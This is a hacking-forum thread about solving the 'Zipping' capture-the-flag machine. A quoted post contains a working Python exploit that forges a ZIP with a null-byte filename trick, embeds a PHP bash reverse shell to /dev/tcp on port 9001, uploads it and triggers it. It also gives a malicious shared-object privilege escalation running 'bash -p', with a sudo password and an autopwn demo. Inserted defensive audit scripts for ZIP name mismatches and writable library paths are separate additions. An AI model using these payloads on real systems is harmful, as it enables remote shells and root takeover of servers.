Posts: 1
Threads: 0
Joined: Aug 2023
Posts: 13
Threads: 0
Joined: Aug 2023
It is cool to have such a writeup!
Thank you!
Posts: 14
Threads: 0
Joined: Aug 2023
Aug 29, 2023, 03:02 PM
(This post was last modified: Aug 29, 2023, 03:13 PM by akaredpanda.)
Thank you bro
Thank you for sharing! I'm completely stuck on it!
Posts: 1
Threads: 0
Joined: Aug 2023
(Aug 28, 2023, 06:37 AM)randomname188 Wrote: I wrote a script to get a reverse shell for user.
start nc port 9001 and then run like this: python script.py -L <your-IP> -R <target-IP>
from struct import pack
import argparse
import zlib
import requests
parser = argparse.ArgumentParser(description='Exploit Zipper')
parser.add_argument('-L', '--listener_ip', help='listener ip')
parser.add_argument('-R', '--target_ip', help='target ip')
args = parser.parse_args()
filename1 = b'rev.php.pdf'
filename2 = b'rev.php\x00.pdf'
filecontent = b"""<?php system("bash -c 'bash -i >& /dev/tcp/"""+args.listener_ip.encode()+b"""/9001 0>&1'"); ?>"""
length = len(filecontent)
crc = zlib.crc32(filecontent)
p = b''
p += b'\x50\x4b\x03\x04' # magic bytes
p += b'\x14\x00' # version
p += b'\x00\x00' # flags
p += b'\x00\x00' # compression
p += b'\x48\xb9' # modtime
p += b'\x1b\x57' # moddate
p += pack("<L", crc) # crc
p += pack("<L", length) # compressed size
p += pack("<L", length) # uncompressed size
p += pack("<H", len(filename1)) # filename len
p += b'\x00\x00' # extra field len
p += filename1
p += filecontent
# central directory
cd = b''
cd += b'\x50\x4b\x01\x02' # magic bytes
cd += b'\x14\x03' # version
cd += b'\x14\x00' # version needed
cd += b'\x00\x00' # flags
cd += b'\x00\x00' # compression
cd += b'\x48\xb9' # modtime
cd += b'\x1b\x57' # moddate
cd += pack("<L", crc) # crc
cd += pack("<L", length) # compressed size
cd += pack("<L", length) # uncompressed size
cd += pack("<H", len(filename2)) # filename len
cd += b'\x00\x00' # extra field len
cd += b'\x00\x00' # file comm. len
cd += b'\x00\x00' # disk start
cd += b'\x00\x00' # internal attr.
cd += b'\x00\x00\xA4\x81' # external attr
cd += b'\x00\x00\x00\x00' # offset of local header
cd += filename2
# end of central directory record
ecd = b''
ecd += b'\x50\x4b\x05\x06' # magic bytes
ecd += b'\x00\x00' # disk number
ecd += b'\x00\x00' # disc # w/cd
ecd += b'\x01\x00' # disc entries
ecd += b'\x01\x00' # total entries
ecd += pack("<L", len(cd)) # central directory size
ecd += pack("<L", len(p)) # offset of central directory (starts right after the local entry)
ecd += b'\x00\x00' # comment length
f = open("rev.zip", "wb")
f.write(p+cd+ecd)
f.close()
url = "http://{}/upload.php".format(args.target_ip)
headers = {"Content-Type":'multipart/form-data'}
files = {'submit':(None,''),'zipFile':('rev.zip',p+cd+ecd)}
resp = requests.post(url, files=files)
# find the uploaded file's path in the response and request it to trigger the payload
for line in resp.text.split('\n'):
    if 'uploads' in line:
        requests.get("http://{}/{}".format(args.target_ip, line.split('"')[1].split(" ")[0]))
        exit(0)
-----------------
For privesc, you can see the binary /usr/bin/stock when you call "sudo -l".
You can reverse engineer the binary to find the password, and find that it loads the shared object from /home/rektsu/.config/libcounter.so.
To exploit it, you need to create a malicious libcounter.so binary.
Example code (filename: exploit.c):
#include <stdlib.h>   /* system() is declared here, not in unistd.h */
#include <unistd.h>
/* destructor: runs when the library is unloaded, i.e. when the binary exits */
void begin (void) __attribute__((destructor));
void begin (void) {
    system("bash -p");
}
Compile the code like this on the target machine:
gcc -shared -o /home/rektsu/.config/libcounter.so -fPIC exploit.c
Then you can run the binary with sudo:
sudo /usr/bin/stock
# password: St0ckM4nager
Press 3 to exit and you get a root shell.
Thanks, works for me.
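Added example, not from this thread and not randomname188's script: a defender-side check for the ZIP trick the quoted script relies on. A ZIP entry carries its filename twice, once in the local file header and once in the central directory, and the script above writes a different name into each. An upload handler that validates one copy while the extractor uses the other can be fooled, so the audit below parses both records (format offsets per the PKZIP APPNOTE), reports any name mismatch, embedded NUL bytes, path traversal and CRC mismatches. The `build_stored_zip` writer and the sample names are constructed for the demo only.

```python
import struct
import zlib

# ZIP record signatures (PKZIP APPNOTE). Every entry has a local file header in
# front of its data and a second copy of its metadata in the central directory;
# extractors normally trust the central directory copy, which is why both names
# are compared here.
LOCAL_SIG = b"PK\x03\x04"
CENTRAL_SIG = b"PK\x01\x02"
EOCD_SIG = b"PK\x05\x06"


def build_stored_zip(local_name: bytes, central_name: bytes, body: bytes) -> bytes:
    """Minimal one-entry, uncompressed ZIP writer, used only to construct samples.

    The two filename arguments let a sample deliberately disagree between the
    local header and the central directory, the condition audit_zip() flags.
    """
    crc = zlib.crc32(body)
    local = LOCAL_SIG + struct.pack(
        "<HHHHHLLLHH", 20, 0, 0, 0, 0, crc, len(body), len(body), len(local_name), 0
    ) + local_name + body
    central = CENTRAL_SIG + struct.pack(
        "<HHHHHHLLLHHHHHLL", 20, 20, 0, 0, 0, 0, crc, len(body), len(body),
        len(central_name), 0, 0, 0, 0, 0, 0
    ) + central_name
    eocd = EOCD_SIG + struct.pack("<HHHHLLH", 0, 0, 1, 1, len(central), len(local), 0)
    return local + central + eocd


def read_local_header(data: bytes, off: int):
    """Parse the 30-byte local file header at `off`; None if no header is there."""
    if not data.startswith(LOCAL_SIG, off):
        return None
    (_ver, _flags, _comp, _t, _d, crc, csize, _usize, nlen, xlen) = struct.unpack_from(
        "<HHHHHLLLHH", data, off + 4
    )
    name = data[off + 30 : off + 30 + nlen]
    start = off + 30 + nlen + xlen
    return {"name": name, "crc": crc, "body": data[start : start + csize]}


def read_central_directory(data: bytes) -> list:
    """Locate the central directory through the end-of-central-directory record
    and return one dict per 46-byte (plus variable fields) entry."""
    eocd = data.rfind(EOCD_SIG)
    if eocd < 0:
        raise ValueError("no end-of-central-directory record")
    (_disk, _cd_disk, _n_disk, n_total, _cd_size, cd_off, _clen) = struct.unpack_from(
        "<HHHHLLH", data, eocd + 4
    )
    entries, off = [], cd_off
    for _ in range(n_total):
        if not data.startswith(CENTRAL_SIG, off):
            raise ValueError(f"central directory entry expected at offset {off}")
        f = struct.unpack_from("<HHHHHHLLLHHHHHLL", data, off + 4)
        crc, nlen, xlen, clen, lh_off = f[6], f[9], f[10], f[11], f[15]
        entries.append({"name": data[off + 46 : off + 46 + nlen], "crc": crc, "local_offset": lh_off})
        off += 46 + nlen + xlen + clen
    return entries


def unsafe_name_reasons(name: bytes) -> list:
    """Name-level problems an extractor should refuse outright."""
    reasons = []
    if b"\x00" in name:
        reasons.append("embedded NUL byte")
    if name.startswith((b"/", b"\\")) or b".." in name.replace(b"\\", b"/").split(b"/"):
        reasons.append("path traversal")
    return reasons


def audit_zip(data: bytes) -> list:
    """Cross-check every central directory entry against its local header."""
    findings = []
    for ce in read_central_directory(data):
        lh = read_local_header(data, ce["local_offset"])
        if lh is None:
            findings.append(f"{ce['name']!r}: offset {ce['local_offset']} is not a local header")
            continue
        if lh["name"] != ce["name"]:
            findings.append(f"filename mismatch: local header {lh['name']!r} vs central directory {ce['name']!r}")
        for where, name in (("local header", lh["name"]), ("central directory", ce["name"])):
            for reason in unsafe_name_reasons(name):
                findings.append(f"{reason} in {where} filename {name!r}")
        if zlib.crc32(lh["body"]) != ce["crc"]:
            findings.append(f"{ce['name']!r}: stored CRC does not match the data")
    return findings


if __name__ == "__main__":
    # constructed samples: a consistent archive and one whose two names disagree
    clean = build_stored_zip(b"invoice.pdf", b"invoice.pdf", b"constructed sample")
    forged = build_stored_zip(b"invoice.pdf", b"invoice.php\x00.pdf", b"constructed sample")
    print("clean :", audit_zip(clean))
    print("forged:", audit_zip(forged))
```

Usage note: run the audit on the raw upload bytes before anything is extracted and reject the archive on any finding; Python's own `zipfile` module, like most extractors, takes names from the central directory, so a check that only looks at the local header (or only at the final extension) sees a different name than the one that ends up on disk.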
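Added example for the privesc part of the quoted post, not from the thread and not the box's own tooling: the root cause there is a sudo-allowed binary that loads a shared object from a path the invoking user controls. The audit below takes a library path and the uid of the user who may run the binary with sudo, and reports whether that user could create, replace or modify the library. Group membership is deliberately not resolved (an assumption that keeps it self-contained); `demo()` builds a constructed temporary directory to show a weak and a hardened layout, and the file it writes is a placeholder, not a real shared object.

```python
import os
import stat
import tempfile


def writable_by(path: str, uid: int) -> bool:
    """True if `uid` could modify `path` via the owner or world write bit.

    Group write bits are ignored (assumption: group membership is not resolved
    here); treat a group-writable path as something to review by hand.
    """
    st = os.lstat(path)
    if st.st_uid == uid and st.st_mode & stat.S_IWUSR:
        return True
    return bool(st.st_mode & stat.S_IWOTH)


def audit_library_path(lib_path: str, uid: int) -> list:
    """Findings for one shared-object path loaded by a privileged binary,
    judged against `uid`, the user allowed to run that binary with sudo."""
    findings = []
    directory = os.path.dirname(lib_path) or "."
    if os.path.isdir(directory) and writable_by(directory, uid):
        findings.append(f"{directory}: writable by uid {uid}; the library can be created or replaced")
    if os.path.islink(lib_path):
        findings.append(f"{lib_path}: is a symlink; resolve and audit its target too")
    if os.path.exists(lib_path) and writable_by(lib_path, uid):
        findings.append(f"{lib_path}: writable by uid {uid}; its contents can be swapped")
    return findings


def demo() -> dict:
    """Constructed layouts: a library under a user-owned directory (the weak case
    from the post) versus a read-only file in a read-only directory."""
    with tempfile.TemporaryDirectory() as d:
        lib = os.path.join(d, "libcounter.so")
        with open(lib, "wb") as fh:
            fh.write(b"constructed placeholder, not a real shared object")
        # weak: the user who runs the binary owns both the directory and the file
        os.chmod(d, 0o700)
        os.chmod(lib, 0o644)
        weak = audit_library_path(lib, os.getuid())
        # hardened: no write bits for anyone, judged against an unrelated unprivileged uid
        os.chmod(lib, 0o444)
        os.chmod(d, 0o555)
        strong = audit_library_path(lib, 65534)  # constructed uid for the demo
        os.chmod(d, 0o700)  # restore so the temporary directory can be removed
        return {"weak": weak, "strong": strong}


if __name__ == "__main__":
    for label, findings in demo().items():
        print(label, findings or ["no findings"])
```

Usage note: the safe layout is the one the hardened half of `demo()` shows: library and directory owned by root, not writable by the sudo user, ideally under a system library directory rather than a home directory; anything a user can write and a root process will `dlopen` is a root shell waiting to happen.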
Posts: 6
Threads: 0
Joined: Aug 2023
(Aug 28, 2023, 12:55 AM)Mandelio Wrote: Hi guys! I'm releasing my second writeup on here.
This time I converted from Markdown to BBCode so it's much more readable.
As always, it includes my thought process and an explanation of what's actually happening. I'll also include an autopwn script soon 
thanksssss
Posts: 18
Threads: 2
Joined: Aug 2023
Aug 30, 2023, 07:01 AM
(This post was last modified: Aug 30, 2023, 07:04 AM by Mandelio.)
For some reason obscure to me, the content of the post containing the autopwn script is literally invisible, I'll repost and hopefully this time it won't disappear...
The programming style is very simple to read as it follows the principle of single-responsibility functions; I've also included some prints to make the whole process more understandable.
The only external dependency required is pwntools which is pretty common so it shouldn't be a problem.
Here's a demo
python auto_pwn.py
[+] Revshell payload written at [...]
[...]
Uploading zip file...
[+] Successfully uploaded zip file, revshell available at [...]
[+] Got revshell as rektsu!
Creating shared object...
[+] Source code for shared object written at [...]
[+] Shared object compiled, written at [...]
Uploading shared object via base64...
Exploiting the binary...
[+] Successfully got root!
root@zipping# id
uid=0(root) gid=0(root) groups=0(root)
root@zipping# ls -la
total 12
drwxr-xr-x 2 rektsu rektsu 4096 Aug 28 08:26 .
drwxrwxr-x 3 root rektsu 4096 Aug 28 08:26 ..
-rw-r--r-- 1 rektsu rektsu 117 Aug 28 08:26 [...]
root@zipping#
Note that [...] only means that the content was censored, it doesn't actually print that.
Without further ado, here's the autopwn script!
[hide cost="8"]
https://pastebin.com/AwuwXr1M
[/hide]
Posts: 1
Threads: 0
Joined: Aug 2023
How to reverse engineer the stock executable to get that shared object path and name? I've been trying various decompilers without luck. Should I debug it in runtime?
Posts: 42
Threads: 2
Joined: Aug 2023
Thanks !!
Posts: 4
Threads: 0
Joined: Aug 2023
Aug 30, 2023, 08:42 AM
(This post was last modified: Aug 30, 2023, 08:51 AM by spider2023.)
thanks very much!!!!!
free >????
(Aug 28, 2023, 12:55 AM)Mandelio Wrote: Hi guys! I'm releasing my second writeup on here.
This time I converted from Markdown to BBCode so it's much more readable.
As always, it includes my thought process and an explanation of what's actually happening. I'll also include an autopwn script soon 
Posts: 2
Threads: 0
Joined: Aug 2023